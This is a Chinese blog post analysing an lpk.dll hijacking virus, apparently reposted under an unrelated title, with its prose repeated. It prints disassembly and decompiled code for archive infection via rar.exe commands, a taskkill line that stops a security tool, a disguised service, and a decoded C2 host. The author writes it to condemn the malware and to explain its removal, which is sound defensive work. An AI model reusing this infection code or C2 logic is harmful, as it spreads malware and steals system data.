2004的英仙座流星雨:pk类病毒分析
来源:百度文库 编辑:偶看新闻 时间:2024/05/06 11:41:42
lpk类病毒分析
病毒体来源http://www.52pojie.cn/thread-75591-1-1.html
除夕那天晚上写了个Lpk、并对lpk做了点研究、所以想必今天晚上看起来这些应该会方便很多、至于关于
lpk的文章请去我Blog参考笔记、这里就不废话了
我的Lpk.cpp
http://hi.baidu.com/hackernewyangjt/blog/item/a4e15a8241ccaab10df4d200.html
直接载入Lpk11.dll
来张图片
接下来的用ida分析
以下是病毒释放出来的核心exe程序分析
有趣的IAT加密
用SOD申请一块内存空间、其实1个字节足以……懒得找空地了、浪费下……
decode
用这块代码把第一部分IAT解密出来了
、大家有兴趣自己玩好了……
肮脏的解密
然后就是CreateThread干坏事
坏事回调函数
004019C0 . 81EC C4090000 sub esp, 9C4
此部分比较长了、而且不大会分析、各位有兴趣可以去看我上传的idb
然后是一系列获取计算机基本信息、然后寄送到上面解密出来的地址……装载肮脏的Lpk进行感染……
至此全病毒感染模块分析完毕……因为本人是网络白痴、就算见到了网络操作代码也不知道到底是干什么的
……囧虚……
此病毒就是启动一个服务、坏事都在服务里做,因为本人也没搞过服务程序开发、所以也不知道这块怎么分
析、不过零散的分析大概已经把服务要做的事情都分析出来了……
删除病毒时首先停止病毒服务、然后用XueTr删除病毒服务、并且来到System32下找到最新更改的exe、大概
就是那个了、建议用工具删除、因为这个东西连压缩文件都感染了、手工处理不大方便、当然也可以写个工
具……
- -讨厌这种用技术干坏事的、鄙视下病毒作者、还真是无聊啊……这种猫和老鼠的游戏大概永远都不会结
束吧……
其实说句实话今天分析这个病毒是因为中午帮同学修电脑修坏了……、发泄下、……真是Bug啊……又把别
人的Bootmgr压缩了……- -刚才已经解决完毕了……所以我也没有必要继续寂寞下去了……娱乐去了、各位
晚安。
游戏CG x1附赠
Azure[LCG]
2011.02.06
病毒体来源http://www.52pojie.cn/thread-75591-1-1.html
除夕那天晚上写了个Lpk、并对lpk做了点研究、所以想必今天晚上看起来这些应该会方便很多、至于关于
lpk的文章请去我Blog参考笔记、这里就不废话了
我的Lpk.cpp
http://hi.baidu.com/hackernewyangjt/blog/item/a4e15a8241ccaab10df4d200.html
直接载入Lpk11.dll
- .text:10001A32 ; =============== S U B R O U T I N E =======================================
- .text:10001A32
- .text:10001A32
- .text:10001A32 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID
- lpReserved)
- .text:10001A32 public DllEntryPoint
- .text:10001A32 DllEntryPoint proc near
- .text:10001A32
- .text:10001A32 hLibModule = dword ptr 4
- .text:10001A32 fdwReason = dword ptr 8
- .text:10001A32 lpReserved = dword ptr 0Ch
- .text:10001A32
- .text:10001A32 cmp [esp+fdwReason], 1
- .text:10001A37 push esi
- .text:10001A38 jnz short loc_10001AA9
- .text:10001A3A mov esi, [esp+4+hLibModule]
- .text:10001A3E push 104h ; nSize
- .text:10001A43 push offset ExistingFileName ; lpFilename
- .text:10001A48 push esi ; hModule
- .text:10001A49 mov dword_10003290, esi
- .text:10001A4F call ds:GetModuleFileNameW
- .text:10001A55 push esi ; hLibModule
- .text:10001A56 call ds:DisableThreadLibraryCalls
- .text:10001A5C call GetMutexName
- .text:10001A61 cmp eax, 1
- .text:10001A64 jnz short loc_10001AA2
- .text:10001A66 call IsVirusKernelFile ;用来判断是否由病毒核
- 心进程释放
- .text:10001A6B test eax, eax
- .text:10001A6D jnz short loc_10001A7D
- .text:10001A6F call CreateMutex
- .text:10001A74 test eax, eax
- .text:10001A76 jnz short loc_10001A7D
- .text:10001A78 call ExpandVirusKernel
- .text:10001A7D
- .text:10001A7D loc_10001A7D: ; CODE XREF: DllEntryPoint+3Bj
- .text:10001A7D ; DllEntryPoint+44j
- .text:10001A7D call IsCurrentFileLpk
- .text:10001A82 cmp eax, 1
- .text:10001A85 jnz short loc_10001AA2
- .text:10001A87 push 0 ; lpName
- .text:10001A89 push 0 ; bInitialState
- .text:10001A8B push eax ; bManualReset
- .text:10001A8C push 0 ; lpEventAttributes
- .text:10001A8E call ds:CreateEventW
- .text:10001A94 mov hHandle, eax
- .text:10001A99 test eax, eax
- .text:10001A9B jz short loc_10001AA2
- .text:10001A9D call StartInfectThraed
- .text:10001AA2
- .text:10001AA2 loc_10001AA2: ; CODE XREF: DllEntryPoint+32j
- .text:10001AA2 ; DllEntryPoint+53j ...
- .text:10001AA2 call InitLpk
- .text:10001AA7 jmp short loc_10001AEC
- .text:10001AA9 ; ---------------------------------------------------------------------------
- 009119E6
/$ 56 push esi - 009119E7 |. 33F6 xor esi, esi
- 009119E9 |. 56 push esi ;
- /pThreadId => NULL
- 009119EA |. 6A 04 push 4 ; |
- CreationFlags = CREATE_SUSPENDED
- 009119EC |. 56 push esi ; |
- pThreadParm => NULL
- 009119ED |. 68 D3189100 push
; | - ThreadFunction =
- 009119F2 |. 56 push esi ; |
- StackSize => 0
- 009119F3 |. 56 push esi ; |
- pSecurity => NULL
- 009119F4 |. FF15 A0209100 call dword ptr [<&KERNEL32.CreateThre>;
- \CreateThread
- 009118D3
. 81EC C4000000 sub esp, 0C4 - 009118D9 . 53 push ebx
- 009118DA . 55 push ebp
- 009118DB . 56 push esi
- 009118DC . 57 push edi
- 009118DD . 6A 60 push 60 ;
- /Length = 60 (96.)
- 009118DF . 8D4424 78 lea eax, dword ptr [esp+78] ; |
- 009118E3 . 50 push eax ; |
- Destination
- 009118E4 . 33FF xor edi, edi ; |
- 009118E6 . FF15 34209100 call dword ptr [<&KERNEL32.RtlZeroMem>;
- \RtlZeroMemory
- 009118EC > 6A 02 push 2
- 009118EE . 5B pop ebx
- 009118EF . 8D6C24 74 lea ebp, dword ptr [esp+74]
- 009118F3 . C74424 10 180>mov dword ptr [esp+10], 18
- 009118FB > 837D 00 01 cmp dword ptr [ebp], 1
- 009118FF . 74 5B je short 0091195C
- 00911901 . 53 push ebx
- 00911902 . FF15 B4209100 call dword ptr [<&SHELL32.#64>] ;
- shell32.DriveType
- 00911908 . 83C0 FE add eax, -2
- 0091190B . 83F8 02 cmp eax, 2 ; 类
- 型否为可感染类型?
- 0091190E . 77 4C ja short 0091195C
- 00911910 . 33C0 xor eax, eax
- 00911912 . 50 push eax ;
- /pThreadId => NULL
- 00911913 . 6A 04 push 4 ; |
- CreationFlags = CREATE_SUSPENDED
- 00911915 . 53 push ebx ; |
- pThreadParm
- 00911916 . 68 77169100 push
; | - ThreadFunction =
- 0091191B . 50 push eax ; |
- StackSize => 0
- 0091191C . 50 push eax ; |
- pSecurity => NULL
- 0091191D . FF15 A0209100 call dword ptr [<&KERNEL32.CreateThre>;
- \CreateThread
- 009119E7 |. 33F6 xor esi, esi
来张图片
接下来的用ida分析
- signed int __stdcall Infect(LPCWSTR lpString1)
- {
- const WCHAR *v2; // [url=mailto:eax@17]eax@17[/url]
- struct _WIN32_FIND_DATAW FindFileData; // [sp+4h] [bp-668h]@6
- WCHAR String2; // [sp+254h] [bp-418h]@4
- WCHAR FileName; // [sp+45Ch] [bp-210h]@6
- HANDLE hFindFile; // [sp+664h] [bp-8h]@6
- int v7; // [sp+668h] [bp-4h]@1
- const WCHAR *v8; // [sp+674h] [bp+8h]@17
- v7 = 1;
- if ( WaitForSingleObject(hHandle, 0) != 258 )
- return 0;
- if ( (unsigned int)lpString1 >= 0x100 )
- {
- lstrcpyW(&String2, lpString1);
- }
- else
- {
- lstrcpyW(&String2, L"A:\\");
- String2 += (unsigned __int16)lpString1;
- }
- lstrcpyW(&FileName, &String2);
- PathAppendW(&String2, &word_10002374);
- hFindFile = FindFirstFileW(&String2, &FindFileData);
- if ( hFindFile == (HANDLE)-1 )
- return 1;
- lstrcpyW(&String2, &FileName);
- while ( 1 )
- {
- if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..")
- )
- goto LABEL_27;
- if ( FindFileData.dwFileAttributes & 0x10 )
- break;
- v2 = PathFindExtensionW(FindFileData.cFileName);
- v8 = v2;
- if ( v2 )
- {
- if ( !lstrcmpiW(v2, L".EXE") ) // 目录下有exe就将lpk复制过去
- {
- lstrcpyW(&FileName, &String2);
- PathAppendW(&FileName, L"lpk.dll");
- if ( GetFileAttributesW(&FileName) != -1 )
- goto LABEL_27;
- CopyFileW(&ExistingFileName, &FileName, 1);
- SetFileAttributesW(&FileName, 7u);
- }
- if ( !lstrcmpiW(v8, L".RAR") || !lstrcmpiW(v8, L".ZIP") )// 压缩包感染过程
- {
- if ( !FindFileData.nFileSizeHigh )
- {
- if ( FindFileData.nFileSizeLow < 0x3200000 )
- {
- lstrcpyW(&FileName, &String2);
- PathAppendW(&FileName, FindFileData.cFileName);
- InfectCompressFile(&FileName);
- }
- }
- }
- }
- DWORD __cdecl InfectCompressFile(int a1)
- {
- DWORD result; // [url=mailto:eax@1]eax@1[/url]
- wchar_t v2[2]; // [url=mailto:eax@3]eax@3[/url]
- UINT v3; // [url=mailto:eax@6]eax@6[/url]
- WCHAR CommandLine; // [sp+0h] [bp-824h]@6
- WCHAR PathName; // [sp+410h] [bp-414h]@6
- WCHAR FileName; // [sp+618h] [bp-20Ch]@1
- const WCHAR String2; // [sp+61Ah] [bp-20Ah]@3
- int v8; // [sp+820h] [bp-4h]@1
- v8 = 520;
- result = SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0,
- &FileName, &v8);
- if ( !result )
- {
- if ( FileName == 34 )
- {
- lstrcpyW(&FileName, &String2);
- *(_DWORD *)v2 = L"\"";
- }
- else
- {
- *(_DWORD *)v2 = L" ";
- }
- result = StrStrIW(&FileName, *(_DWORD *)v2);
- if ( result )
- {
- *(_WORD *)result = 0;
- PathRemoveFileSpecW(&FileName);
- PathAppendW(&FileName, L"rar.exe");
- result = GetFileAttributesW(&FileName);
- if ( result != -1 )
- {
- PathGetShortPath(&FileName);
- GetTempPathW(MAX_PATH, &PathName);
- v3 = GetCurrentThreadId();
- GetTempFileNameW(&PathName, L"IRAR", v3, &PathName);
- ((void (__cdecl *)(WCHAR *, _DWORD, WCHAR *, int, WCHAR *))wsprintfW)(
- &CommandLine,
- L"cmd /c %s vb \"%s\" lpk.dll|find /i \"lpk.dll\"",
- &FileName,
- a1,
- &PathName);
- result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
- if ( result )
- {
- wsprintfW(&CommandLine, L"\"%s\" x \"%s\" *.exe \"%s\\\"", &FileName, a1,
- &PathName);
- UpdatePackage(&CommandLine, 0x1D4C0u);
- Infect(&PathName);
- wsprintfW(&CommandLine, L"\"%s\" a -r -ep1\"%s\" \"%s\" \"%s\\lpk.dll\"", &FileName,
- &PathName, a1, &PathName);
- UpdatePackage(&CommandLine, 0x3A980u);
- wsprintfW(&CommandLine, L"cmd /c RD /s /q \"%s\"", &PathName);
- result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
- }
- }
- }
- }
- return result;
- }
以下是病毒释放出来的核心exe程序分析
有趣的IAT加密
用SOD申请一块内存空间、其实1个字节足以……懒得找空地了、浪费下……
decode
- FF 05 00 00 AF 00 A1 00 00 AF 00 6B C0 12 8D 80 3C 36 40 00 FF E0 FF 25 70 62 40 00 51 52 68 E0 8D 40 00 E9 00 00 00 00 68 78 69 40 00 E8 EE 02 00 00 5A 59 EB CA
- 00403600 $ FF05 0000AF00 inc dword ptr [AF0000]
用这块代码把第一部分IAT解密出来了
- 00403636 .- FF25 E08D4000 jmp dword ptr [408DE0] ; USER32.LoadIconA
- 0040363C $ 51 push ecx
- 0040363D . 52 push edx
- 0040363E . 68 DC8D4000 push 00408DDC
- 00403643 .^ E9 E0FFFFFF jmp 00403628
- 00403648 .- FF25 DC8D4000 jmp dword ptr [408DDC] ; USER32.wsprintfA
- 0040364E $ 51 push ecx
- 0040364F . 52 push edx
- 00403650 . 68 D88D4000 push 00408DD8
- 00403655 .^ E9 CEFFFFFF jmp 00403628
- 0040365A .- FF25 D88D4000 jmp dword ptr [408DD8] ;
- USER32.GetDesktopWindow
- 00403660 $ 51 push ecx
- 00403661 . 52 push edx
- 00403662 . 68 E48D4000 push 00408DE4
- 00403667 .^ E9 BCFFFFFF jmp 00403628
- 0040366C .- FF25 E48D4000 jmp dword ptr [408DE4] ; USER32.SetWindowLongA
- 00403672 $ 51 push ecx
- 00403673 . 52 push edx
- 00403674 . 68 D08D4000 push 00408DD0
- 00403679 .^ E9 AAFFFFFF jmp 00403628
- 0040367E .- FF25 D08D4000 jmp dword ptr [408DD0] ; USER32.SendMessageA
- 00403684 $ 51 push ecx
- 00403685 . 52 push edx
- 00403686 . 68 CC8D4000 push 00408DCC
- 0040368B .^ E9 98FFFFFF jmp 00403628
- 00403690 .- FF25 CC8D4000 jmp dword ptr [408DCC] ; USER32.DrawIcon
- 00403696 $ 51 push ecx
- 00403697 . 52 push edx
- 00403698 . 68 C88D4000 push 00408DC8
- 0040369D .^ E9 86FFFFFF jmp 00403628
- 004036A2 .- FF25 C88D4000 jmp dword ptr [408DC8] ; USER32.GetClientRect
- 004036A8 . 51 push ecx
- 004036A9 . 52 push edx
- 004036AA . 68 C48D4000 push 00408DC4
- 004036AF .^ E9 74FFFFFF jmp 00403628
- 004036B4 .- FF25 C48D4000 jmp dword ptr [408DC4] ;
- USER32.GetSystemMetrics
- 004036BA $ 51 push ecx
- 004036BB . 52 push edx
- 004036BC . 68 D48D4000 push 00408DD4
- 004036C1 .^ E9 62FFFFFF jmp 00403628
- 004036C6 .- FF25 D48D4000 jmp dword ptr [408DD4] ; USER32.IsIconic
- 004036CC $ 51 push ecx
- 004036CD . 52 push edx
- 004036CE . 68 E88D4000 push 00408DE8
- 004036D3 .^ E9 50FFFFFF jmp 00403628
- 004036D8 .- FF25 E88D4000 jmp dword ptr [408DE8] ; USER32.EnableWindow
- 00408DC4 77D18F9C USER32.GetSystemMetrics
- 00408DC8 77D2908E USER32.GetClientRect
- 00408DCC 77D3D06C USER32.DrawIcon
- 00408DD0 77D2F3C2 USER32.SendMessageA
- 00408DD4 77D297FF USER32.IsIconic
- 00408DD8 77D2D1D2 USER32.GetDesktopWindow
- 00408DDC 77D1A8AD USER32.wsprintfA
- 00408DE0 77D2E8F6 USER32.LoadIconA
- 00408DE4 77D2C29D USER32.SetWindowLongA
- 00408DE8 77D29849 USER32.EnableWindow
- 004036D3 >^/E9 28FFFFFF jmp 00403600
- 004036D8 .^|FF25 E88D4000 jmp dword ptr [408DE8] ; ggmqgk.004036CC
- 004036DE $ |51 push ecx
- 004036DF . |52 push edx
- 004036E0 . |68 AC8D4000 push 00408DAC
- 004036E5 . |E9 00000000 jmp 004036EA
- 004036EA > |68 98694000 push 00406998
- 004036EF . |E8 2C020000 call 00403920
- 004036F4 . |5A pop edx
- 004036F5 . |59 pop ecx
- 004036F6 .^\EB DB jmp short 004036D3
- 004036F8 .- FF25 AC8D4000 jmp dword ptr [408DAC] ; advapi32.DeleteService
- 004036FE $ 51 push ecx
- 004036FF . 52 push edx
- 00403700 . 68 B08D4000 push 00408DB0 ; ASCII "6L躻~i躻"
- 00403705 .^ E9 E0FFFFFF jmp 004036EA
- 0040370A .- FF25 B08D4000 jmp dword ptr [408DB0] ; advapi32.OpenServiceA
- 00403710 $ 51 push ecx
- 00403711 . 52 push edx
- 00403712 . 68 B48D4000 push 00408DB4 ; ASCII "~i躻"
- 00403717 .^ E9 CEFFFFFF jmp 004036EA
- 0040371C .- FF25 B48D4000 jmp dword ptr [408DB4] ;
- advapi32.OpenSCManagerA
- 00403722 $ 51 push ecx
- 00403723 . 52 push edx
- 00403724 . 68 A88D4000 push 00408DA8
- 00403729 .^ E9 BCFFFFFF jmp 004036EA
- 0040372E .- FF25 A88D4000 jmp dword ptr [408DA8] ; advapi32.RegCloseKey
- 00403734 $ 51 push ecx
- 00403735 . 52 push edx
- 00403736 . 68 A48D4000 push 00408DA4
- 0040373B .^ E9 AAFFFFFF jmp 004036EA
- 00403740 .- FF25 A48D4000 jmp dword ptr [408DA4] ;
- advapi32.RegQueryValueExA
- 00403746 $ 51 push ecx
- 00403747 . 52 push edx
- 00403748 . 68 A08D4000 push 00408DA0
- 0040374D .^ E9 98FFFFFF jmp 004036EA
- 00403752 .- FF25 A08D4000 jmp dword ptr [408DA0] ; advapi32.RegOpenKeyExA
- 00403758 . 51 push ecx
- 00403759 . 52 push edx
- 0040375A . 68 9C8D4000 push 00408D9C
- 0040375F .^ E9 86FFFFFF jmp 004036EA
- 00403764 .- FF25 9C8D4000 jmp dword ptr [408D9C] ;
- advapi32.SetServiceStatus
- 0040376A $ 51 push ecx
- 0040376B . 52 push edx
- 0040376C . 68 988D4000 push 00408D98
- 00403771 .^ E9 74FFFFFF jmp 004036EA
- 00403776 .- FF25 988D4000 jmp dword ptr [408D98] ;
- advapi32.RegisterServiceCtrlHandlerA
- 0040377C $ 51 push ecx
- 0040377D . 52 push edx
- 0040377E . 68 948D4000 push 00408D94
- 00403783 .^ E9 62FFFFFF jmp 004036EA
- 00403788 .- FF25 948D4000 jmp dword ptr [408D94] ;
- advapi32.StartServiceCtrlDispatcherA
- 0040378E $ 51 push ecx
- 0040378F . 52 push edx
- 00403790 . 68 908D4000 push 00408D90
- 00403795 .^ E9 50FFFFFF jmp 004036EA
- 0040379A .- FF25 908D4000 jmp dword ptr [408D90] ;
- advapi32.CloseServiceHandle
- 004037A0 $ 51 push ecx
- 004037A1 . 52 push edx
- 004037A2 . 68 8C8D4000 push 00408D8C
- 004037A7 .^ E9 3EFFFFFF jmp 004036EA
- 004037AC .- FF25 8C8D4000 jmp dword ptr [408D8C] ;
- advapi32.RegSetValueExA
- 004037B2 $ 51 push ecx
- 004037B3 . 52 push edx
- 004037B4 . 68 888D4000 push 00408D88
- 004037B9 .^ E9 2CFFFFFF jmp 004036EA
- 004037BE .- FF25 888D4000 jmp dword ptr [408D88] ; advapi32.RegOpenKeyA
- 004037C4 $ 51 push ecx
- 004037C5 . 52 push edx
- 004037C6 . 68 808D4000 push 00408D80
- 004037CB .^ E9 1AFFFFFF jmp 004036EA
- 004037D0 .- FF25 808D4000 jmp dword ptr [408D80] ; advapi32.StartServiceA
- 004037D6 $ 51 push ecx
- 004037D7 . 52 push edx
- 004037D8 . 68 848D4000 push 00408D84
- 004037DD .^ E9 08FFFFFF jmp 004036EA
- 004037E2 .- FF25 848D4000 jmp dword ptr [408D84] ;
- advapi32.CreateServiceA
- 00408D80 77DBFB38 advapi32.StartServiceA
- 00408D84 77E071E9 advapi32.CreateServiceA
- 00408D88 77DAEFB8 advapi32.RegOpenKeyA
- 00408D8C 77DAEAD7 advapi32.RegSetValueExA
- 00408D90 77DB6CC5 advapi32.CloseServiceHandle
- 00408D94 77E07EB1 advapi32.StartServiceCtrlDispatcherA
- 00408D98 77DC4E96 advapi32.RegisterServiceCtrlHandlerA
- 00408D9C 77DC3231 advapi32.SetServiceStatus
- 00408DA0 77DA7842 advapi32.RegOpenKeyExA
- 00408DA4 77DA7AAB advapi32.RegQueryValueExA
- 00408DA8 77DA6C17 advapi32.RegCloseKey
- 00408DAC 77E07489 advapi32.DeleteService
- 00408DB0 77DC4C36 advapi32.OpenServiceA
- 00408DB4 77DC697E advapi32.OpenSCManagerA
、大家有兴趣自己玩好了……
- .text:004029E0 ; =============== S U B R O U T I N E =======================================
- .text:004029E0
- .text:004029E0 ; Attributes: bp-based frame
- .text:004029E0
- .text:004029E0 OnInit proc near ; DATA XREF: .rdata:00406474o
- .text:004029E0
- .text:004029E0 ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -10h
- .text:004029E0 var_8 = dword ptr -8
- .text:004029E0 var_4 = dword ptr -4
- .text:004029E0
- .text:004029E0 push ebp
- .text:004029E1 ; 8: v1 = this;
- .text:004029E1 mov ebp, esp
- .text:004029E3 sub esp, 10h
- .text:004029E6 push esi
- .text:004029E7 push edi
- .text:004029E8 mov esi, ecx
- .text:004029EA ; 9: CDialog__OnInitDialog();
- .text:004029EA call [url=mailto:?OnInitDialog@CDialog@@UAEHXZ]?OnInitDialog@CDialog@@UAEHXZ[/url] ; CDialog::OnInitDialog
- (void)
- .text:004029EF ; 10: SendMessageA(*((HWND *)v1 + 8), 128u, 1u, *((_DWORD *)v1 + 24));
- .text:004029EF mov eax, [esi+60h]
- .text:004029F2 mov ecx, [esi+20h]
- .text:004029F5 mov edi, SendMessageA
- .text:004029FB push eax ; lParam
- .text:004029FC push 1 ; wParam
- .text:004029FE push 80h ; Msg
- .text:00402A03 push ecx ; hWnd
- .text:00402A04 call edi ; SendMessageA
- .text:00402A06 ; 11: SendMessageA(*((HWND *)v1 + 8), 0x80u, 0, *((_DWORD *)v1 + 24));
- .text:00402A06 mov edx, [esi+60h]
- .text:00402A09 mov eax, [esi+20h]
- .text:00402A0C push edx ; lParam
- .text:00402A0D push 0 ; wParam
- .text:00402A0F push 80h ; Msg
- .text:00402A14 push eax ; hWnd
- .text:00402A15 call edi ; SendMessageA
- .text:00402A17 ; 12: if ( v1 )
- .text:00402A17 test esi, esi
- .text:00402A19 jnz short loc_402A1F
- .text:00402A1B ; 15: v2 = 0;
- .text:00402A1B xor eax, eax
- .text:00402A1D jmp short loc_402A22
- .text:00402A1F ; ---------------------------------------------------------------------------
- .text:00402A1F ; 13: v2 = (HWND)*((_DWORD *)v1 + 8);
- .text:00402A1F
- .text:00402A1F loc_402A1F: ; CODE XREF: OnInit+39j
- .text:00402A1F mov eax, [esi+20h]
- .text:00402A22 ; 16: SetWindowLongA(v2, -20, 128);
- .text:00402A22
- .text:00402A22 loc_402A22: ; CODE XREF: OnInit+3Dj
- .text:00402A22 push 80h ; dwNewLong
- .text:00402A27 push 0FFFFFFECh ; nIndex
- .text:00402A29 push eax ; hWnd
- .text:00402A2A call SetWindowLongA
- .text:00402A30 ; 17: CWnd__SetWindowPos(v1, 0, -100, -100, 0, 0, 1);
- .text:00402A30 push 1
- .text:00402A32 push 0
- .text:00402A34 push 0
- .text:00402A36 push 0FFFFFF9Ch
- .text:00402A38 push 0FFFFFF9Ch
- .text:00402A3A push 0
- .text:00402A3C mov ecx, esi
- .text:00402A3E call [url=mailto:?SetWindowPos@CWnd@@QAEHPBV1@HHHHI@Z]?SetWindowPos@CWnd@@QAEHPBV1@HHHHI@Z[/url] ;
- CWnd::SetWindowPos(CWnd const *,int,int,int,int,uint)
- .text:00402A43 ; 18: WinExec("taskkill /f /im ZhuDongFangYu.exe /t", 0);// - -这种方法也能杀
- 掉?作者脑子里进屎了、
- .text:00402A43 nop
- .text:00402A44 nop
- .text:00402A45 nop
- .text:00402A46 nop
- .text:00402A47 nop
- .text:00402A48 nop
- .text:00402A49 nop
- .text:00402A4A nop
- .text:00402A4B nop
- .text:00402A4C nop
- .text:00402A4D nop
- .text:00402A4E nop
- .text:00402A4F nop
- .text:00402A50 nop
- .text:00402A51 nop
- .text:00402A52 nop
- .text:00402A53 nop
- .text:00402A54 nop
- .text:00402A55 nop
- .text:00402A56 push 0 ; uCmdShow
- .text:00402A58 push offset CmdLine ; "taskkill /f /im ZhuDongFangYu.exe
- /t"
- .text:00402A5D call ds:WinExec
- .text:00402A63 ; 19: if ( RegOpenKey() )
- .text:00402A63 call RegOpenKey
- .text:00402A68 pop edi
- .text:00402A69 pop esi
- .text:00402A6A test eax, eax
- .text:00402A6C jz short loc_402A9D
- .text:00402A6E ; 21: ServiceStartTable.lpServiceName = "Distribuvbf";
- .text:00402A6E lea ecx, [ebp+ServiceStartTable]
- .text:00402A71 mov [ebp+ServiceStartTable.lpServiceName], offset
- ServiceName ; "Distribuvbf"
- .text:00402A78 ; 22: ServiceStartTable.lpServiceProc = (LPSERVICE_MAIN_FUNCTIONA)
- sub_402730;
- .text:00402A78 push ecx ; lpServiceStartTable
- .text:00402A79 mov [ebp+ServiceStartTable.lpServiceProc], offset
- sub_402730
- .text:00402A80 ; 23: v5 = 0;
- .text:00402A80 mov [ebp+var_8], 0
- .text:00402A87 ; 24: v6 = 0;
- .text:00402A87 mov [ebp+var_4], 0
- .text:00402A8E ; 25: StartServiceCtrlDispatcherA(&ServiceStartTable);
- .text:00402A8E call StartServiceCtrlDispatcherA ; 存在就直接启动
- .text:00402A94 ; 39: return 1;
- .text:00402A94
- .text:00402A94 loc_402A94: ; CODE XREF: OnInit+DBj
- .text:00402A94 mov eax, 1
- .text:00402A99 mov esp, ebp
- .text:00402A9B pop ebp
- .text:00402A9C retn
- .text:00402A9D ; ---------------------------------------------------------------------------
- .text:00402A9D ; 29: sub_402B40(
- .text:00402A9D ; 30: "Distribuvbf",
- .text:00402A9D ; 31: "Distribuihd Transaction Coordinator Service",
- .text:00402A9D ; 32: "Distribucha Transaction Coordinator Service.");
- .text:00402A9D
- .text:00402A9D loc_402A9D: ; CODE XREF: OnInit+8Cj
- .text:00402A9D push offset Data ; "Distribucha Transaction Coordinator
- Ser"...
- .text:00402AA2 push offset DisplayName ; "Distribuihd Transaction
- Coordinator Ser"...
- .text:00402AA7 push offset ServiceName ; "Distribuvbf"
- .text:00402AAC call RegServiceAndStart
- .text:00402AB1 ; 33: if ( dword_409388 )
- .text:00402AB1 mov eax, dword_409388 ; 失败了就退出……
- .text:00402AB6 add esp, 0Ch
- .text:00402AB9 test eax, eax
- .text:00402ABB jz short loc_402A94
- .text:00402ABD ; 35: sub_402330();
- .text:00402ABD call MoveFile ; 0012F65C 0012F784 |NewName = "C:
- \DOCUME~1\ADMINI~1\LOCALS~1\Temp\SOFTWARE.LOG"
- .text:00402AC2 ; 36: ExitProcess(0);
- .text:00402AC2 push 0 ; uExitCode
- .text:00402AC4 call ds:ExitProcess
- .text:00402AC4 OnInit endp
肮脏的解密
- .text:004027E6 ; 20: lpkInfect();
- .text:004027E6
- .text:004027E6 loc_4027E6: ; CODE XREF: sub_402730+A9j
- .text:004027E6 call lpkInfect
- .text:004027EB ; 21: wsprintfA(&v0, "hra%u.dll", 33);
- .text:004027EB push 21h
- .text:004027ED lea ecx, [esp+14h]
- .text:004027F1 push offset aHraU_dll ; "hra%u.dll"
- .text:004027F6 push ecx ; LPSTR
- .text:004027F7 call wsprintfA
- .text:004027FD ; 22: sub_402520(&v0);
- .text:004027FD lea edx, [esp+1Ch]
- .text:00402801 push edx ; pFileName
- .text:00402802 call sub_402520
- .text:00402807 ; 23: LoadVirusLpk();
- .text:00402807 call LoadVirusLpk
- .text:0040280C ; 24: decode((int)"s僼婸3344P弔?>6>6", strlen("s僼婸3344P弔?>6>6") - 1, 18);
- .text:0040280C mov edi, offset aSgtlp3344pptz66 ; ; ASCII
- "scrk.3322.org:8080"
- .text:0040280C ; 解密以后的字符串
- .text:00402811 or ecx, 0FFFFFFFFh
- .text:00402814 xor eax, eax
- .text:00402816 push 12h
- .text:00402818 repne scasb
- .text:0040281A not ecx
- .text:0040281C dec ecx
- .text:0040281D push ecx
- .text:0040281E push offset aSgtlp3344pptz66 ; "s僼婸3344P弔?>6>6"
- .text:00402823 call decode
- .text:00402828 ; 25: WSAStartup(0x202u, (struct WSAData *)((char *)&WSAData + 16));
- .text:00402828 add esp, 1Ch
- .text:0040282B lea eax, [esp+294h+WSAData.szDescription+0Ch]
- .text:00402832 push eax ; lpWSAData
- .text:00402833 push 202h ; wVersionRequested
- .text:00402838 call WSAStartup
- .text:0040283E mov edi, ds:WaitForSingleObject
- .text:00402844 mov ebx, ds:CloseHandle
- .text:0040284A mov ebp, closesocket
- .text:00402850 ; 28: hObject = CreateThraed((LPTHREAD_START_ROUTINE)bAdApple, 0);我对臭苹
- 果的怨念是世界级的……
- .text:00402850
- .text:00402850 loc_402850: ; CODE XREF: sub_402730+159j
- .text:00402850 push 0 ; lpParameter
- .text:00402852 push offset bAdApple ; lpStartAddress
- .text:00402857 call CreateThraed
- .text:0040285C ; 29: WaitForSingleObject(hObject, 0xFFFFFFFFu);
- .text:0040285C push 0FFFFFFFFh ; dwMilliseconds
- .text:0040285E ; 26: while ( 1 )
- .text:0040285E push eax ; hHandle
- .text:0040285F mov hObject, eax
- .text:00402864 call edi ; WaitForSingleObject
- .text:00402866 ; 30: CloseHandle(hObject);
- .text:00402866 mov ecx, hObject
- .text:0040286C push ecx ; hObject
- .text:0040286D call ebx ; CloseHandle
- .text:0040286F ; 31: closesocket(s);
- .text:0040286F mov edx, s
- .text:00402875 push edx ; s
- .text:00402876 call ebp ; closesocket
- .text:00402878 ; 33: Sleep(0x12Cu);
- .text:00402878 push 12Ch ; dwMilliseconds
- .text:0040287D ; 32: dword_408634 = 1;
- .text:0040287D mov dword_408634, 1
- .text:00402887 call esi ; Sleep
- .text:00402889 jmp short loc_402850
然后就是CreateThread干坏事
坏事回调函数
004019C0 . 81EC C4090000 sub esp, 9C4
此部分比较长了、而且不大会分析、各位有兴趣可以去看我上传的idb
然后是一系列获取计算机基本信息、然后寄送到上面解密出来的地址……装载肮脏的Lpk进行感染……
至此全病毒感染模块分析完毕……因为本人是网络白痴、就算见到了网络操作代码也不知道到底是干什么的
……囧虚……
此病毒就是启动一个服务、坏事都在服务里做,因为本人也没搞过服务程序开发、所以也不知道这块怎么分
析、不过零散的分析大概已经把服务要做的事情都分析出来了……
删除病毒时首先停止病毒服务、然后用XueTr删除病毒服务、并且来到System32下找到最新更改的exe、大概
就是那个了、建议用工具删除、因为这个东西连压缩文件都感染了、手工处理不大方便、当然也可以写个工
具……
- -讨厌这种用技术干坏事的、鄙视下病毒作者、还真是无聊啊……这种猫和老鼠的游戏大概永远都不会结
束吧……
其实说句实话今天分析这个病毒是因为中午帮同学修电脑修坏了……、发泄下、……真是Bug啊……又把别
人的Bootmgr压缩了……- -刚才已经解决完毕了……所以我也没有必要继续寂寞下去了……娱乐去了、各位
晚安。
游戏CG x1附赠
